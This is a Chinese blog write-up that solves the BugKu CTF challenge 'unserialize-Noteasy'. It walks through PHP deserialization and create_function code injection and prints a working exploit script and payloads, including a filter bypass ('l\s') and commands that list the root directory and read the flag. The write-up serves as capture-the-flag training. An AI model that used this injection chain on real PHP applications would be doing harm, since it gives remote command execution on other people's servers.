BugKu-WEB-unserialize-Noteasy

最新推荐文章于 2025-06-03 17:09:50 发布
原创 最新推荐文章于 2025-06-03 17:09:50 发布 · 1.2k 阅读 · 12 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#前端 #python #web安全 #安全 #网络安全 #php

前言

人道是,

纵使风雨兼程路,笑对人生百态情.

一起用一道序列化开启暑假.

正文

<?php

if (isset($_GET['p'])) {
    $p = unserialize($_GET['p']);
}
show_source("index.php");

class Noteasy
{
    private $a;
    private $b;

    public function __construct($a, $b)
    {
        //在check后将ab拼接执行
        $this->a = $a;
        $this->b = $b;
        $this->check($a.$b);
        eval($a.$b);
    }


    public function __destruct()
    {
        //强制转换string后进行check
        $a = (string)$this->a;
        $b = (string)$this->b;
        $this->check($a.$b);
        $a("", $b);//挺迷的其实,以空字符串""作为函数名调用,并将$b作为参数传递给这个函数,按理来说是逻辑错误
    }


    private function check($str)
    {
        //绕过这个有点麻烦
        if (preg_match_all("(ls|find|cat|grep|head|tail|echo)", $str) > 0) die("You are a hacker, get out");
    }


    public function setAB($a, $b)
    {
        $this->a = $a;
        $this->b = $b;
    }
}

整块分析下来只能用非常规方法进行序列化生成并利用

所以我们进行思路整理,我们可以发现

反序列化并不会执行构造函数,所以忽略 __construct()

而__destruct()是必被执行的,那么destruct中的$a("", $b);或许能够帮助我们拿到flag

我想起了18年的Code Breaking

里面有这样一题:

 <?php
$action = $_GET['action'] ?? '';
$arg = $_GET['arg'] ?? '';

if(preg_match('/^[a-z0-9_]*$/isD', $action)) {
    show_source(__FILE__);
} else {
    $action('', $arg);
}

这题的解法是利用特性使用create_function

而create_function由于自身的危险性,在php8以后就被删除

但是这题

emmmmm

那么就干吧

思路

先来讲一下create_function的原理

基本语法如下:

string create_function(string $args, string $code);
-------------------------------------------------------
$double = create_function('$num', 'return $num * 2;');
echo $double(5); // 输出10

那么

a=create_function,b=show_source('');b=;}system("ls");/*;

这样构造闭合

create_function("", ";}system("ls");/*;

就变成了

function ()
{
;
}
system("ls");/*;}

由于代码是简单拼接,所以可以直接这样闭合,比如:

如果第一个参数可控,则: create_function('){}phpinfo();/*;','')

如果第二个参数可控,则: create_function('','phpinfo();/*;})

对了,由于check里面限制了ls,所以我们需要绕过,payload就变为

create_function("", ";}system("l\s");/*;

exp: 

<?php
class Noteasy
{
    private $a;
    private $b;

    public function __construct($a, $b)
    {
        $this->a = $a;
        $this->b = $b;
    }
}

$a=new Noteasy("create_function",';}system("l\s /");/*;');
echo serialize($a);

然后用more拿flag

成功

结尾

暑假来临,该卷起来了师傅们//DOGE

求赞求关注,感谢

bugku_noteasytrick
weixin_50076644的博客
07-29 843
bugku_web_noteasytrick
BUGKU-WEB-WEB41
qq_25755011的博客
04-21 1521
一道反序列化字符串逃逸+ssrf的综合题 解题思路 字符串逃逸 题目源码如下: <?php // php版本:5.4.44 header("Content-type: text/html; charset=utf-8"); highlight_file(__FILE__); class evil{ public $hint; public function __construct($hint){ $this->hint = $hint; }
bugku unserialize-Noteasy笔记
2401_84140255的博客
12-27 557
刚开始还以为能用system,结果上网搜发现system只会执行第一个参数,第二个参数是存储命令输出的最后一行。令$a=create_function,$b=}system("ls /");最后看了评论区才知道用的是create_function的漏洞。过滤了ls,所以让$b=}system("l\s /");但是执行destruct方法时还会执行一个过滤函数check。然后再让$b=}system("tac /flag");拼接成有效的 PHP 函数代码,并通过。$a("", $b);
BugKu-WEB-unserialize-Noteasy(create_function()代码注入)
最新发布
2301_80975944的博客
06-03 741
打 create_function 注入即可。第一个参数为空的函数,特征很明显是。:php反序列化读取。
Bugku noteasytrick
qq_53460654的博客
05-21 2914
打开环境 <?php error_reporting(0); ini_set("display_errors","Off"); class Jesen { public $filename; public $content; public $me; function __wakeup(){ $this->me = new Ctf(); } function __destruct() { $this->me-&
攻防世界--Web进阶--Web_php_unserialize--反序列化---正则表达式---wakeup绕过----base64加密
z2560088的博客
10-10 1488
来自攻防世界的一道web进阶题,名为Web_php_unserialize 题目给出了一段php代码,应该是后台的部分源码: <?php class Demo { private $file = 'index.php'; public function __construct($file) { $this->file = $file;//将file变量的文件名赋值给当前类的file。当解构出该类实例化的对象后,该对象的file就是此时赋值的fi..
【攻防世界-Web进阶篇-006Web_php_unserialize
gyy990526的博客
03-14 2105
解:打开靶机是一段php代码,代码审计,发现是一道反序列化问题。在上一篇咱们提到过_wakeup()函数需要通过不正确的属性值来绕过,所以这一点已经解决。 <?php class Demo { private $file = 'index.php'; public function __construct($file) { //创建时执行 $this->file = $file; } function __destruct() { //摧
【攻防世界-Web进阶篇-005unserialize3】
gyy990526的博客
03-14 2905
解:打开靶机是一段php代码,最后问你?code=应该等于多少,看见_wakeup()就是典型的反序列化的题。 题目比较简单,只有一个xctf类,首先需要对其实例化,再用serialize进行序列化输出字符串 : <?php class xctf{ public $flag = '111'; public function __wakeup(){ exit('bad requests'); } } $xctf=new xc
Bugku WEB noteasytrick
qq_41696858的博客
07-30 680
首先感谢大佬的文章,我是一直卡在如何删除lock文件,先放传送门: https://blog.csdn.net/qq_53460654/article/details/116798346 这题的主要考点数ZipArchive类用open方法删除文件和fastcoll工具的运用 <?php error_reporting(0); ini_set("display_errors","Off"); class Jesen { public $filename; public $content
Bugku之Java Fastjson Unserialize
qq_40646572的博客
05-10 836
打开题目,花费金币,心疼ing。 打开题目网站,发现一个登陆页面,先来波bp。 bp抓包后发现,这个发送的json信息,结合题目给出的fastjson反序列化,应该就是直接在这个参数上传payload了。不慌,先发送下看下回复。 咦,好像此处回复有点意思,好像是源码,直接打开这个地址。 没错,这个是源码。先打开看下,是否存在有用的信息。 编写exp test.java test.java import java.lang.Runtime; import java.lang.Process; .
bugkuctf | noteasytrick 反序列化漏洞
菜鸡一枚
02-19 658
bugku-noteasytrick 反序列化漏洞,利用ZipArchive内置类删文件,fastcoll构造同md5不同内容文件绕过判断
【无标题】
weixin_51387754的博客
09-08 695
ctf可意译为“夺旗赛”。其大致流程是,参赛团队之间通过进行攻防对抗、程序分析等形式,率先从主办方给出的比赛环境中得到一串具有一定格式的字符串或其他内容,并将其提交给主办方,从而夺得分数。为了方便称呼,我们把这样的内容称之为“Flag”。
Bugku 做题记录31~35
Goodric的博客
03-18 343
Bugku 题目 web 方向 web31 题目描述:好像需要管理员。 打开场景是这样的,单在页面上找的话找不到什么有用的信息。 用御剑扫描存在的后台,几秒钟就扫出了 robots.txt 。 访问 /robots.txt ,得到另一个地址:/resusl.php 访问 /resusl.php ,得到一些提示,把参数 password 传入 参数 x ,但是现在不知道 password 的值。 刚开始一直在找 password 的值,但是找不到。 然后回到页面传参语句上面还有一些信息说不是管理员。
php unserialize 非关联数组_原创干货 | php反序列化那些事
weixin_39708557的博客
11-29 721
点击上方“蓝字”带你去看小星星导图开头一张图,内容全靠编序列化与反序列化在 PHP中,序列化使用 serialize()函数将对象转化为可传输的字符串,反序列化则使用unserialize() 将字符串还原为对象。序列化结果分析解释一下不同数据类型序列化的结果:<SOAP-ENV:Envelopexmlns:SOAP-ENV="http://schemas.xmlsoap.org/...
Bugku-CTF之welcome to bugkuctf(php://filter和php://input的妙用)
weixin_33774308的博客
04-26 338
Day24 welcome to bugkuctf http://123.206.87.240:8006/test1/ 本题要点:代码审计,PHP://filter , php://input , base64解密,反序列化 查看一下源码 审计源码,我们可以发现~ (1)get方式传递三个参数,分别是txt、file...
CTfshow 卷王杯 easy unserialize(特详)
Jay17的博客
05-12 922
CTfshow 卷王杯 easy unserialize(特详)
攻防世界-----Web_php_unserialize
yanbai3的博客
01-04 1208
攻防世界-----Web_php_unserialize 开始刷web题,发现新世界,记录一下 1.序列化(serialize)和反序列化(unserialize) 序列化就是将对象转化为字节序列/字符串,在序列化对象之前,对象的类要实例化/定义过,字符串中包括了类名、对象中所有变量值,但不包括方法。而反序列化后,会将字符串转换回变量,并重建类或对象。 2.正则表达式 正则表达式是匹配模式,要么匹配字符,要么匹配位置。 建议查看https://juejin.cn/post/68449034871557324
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值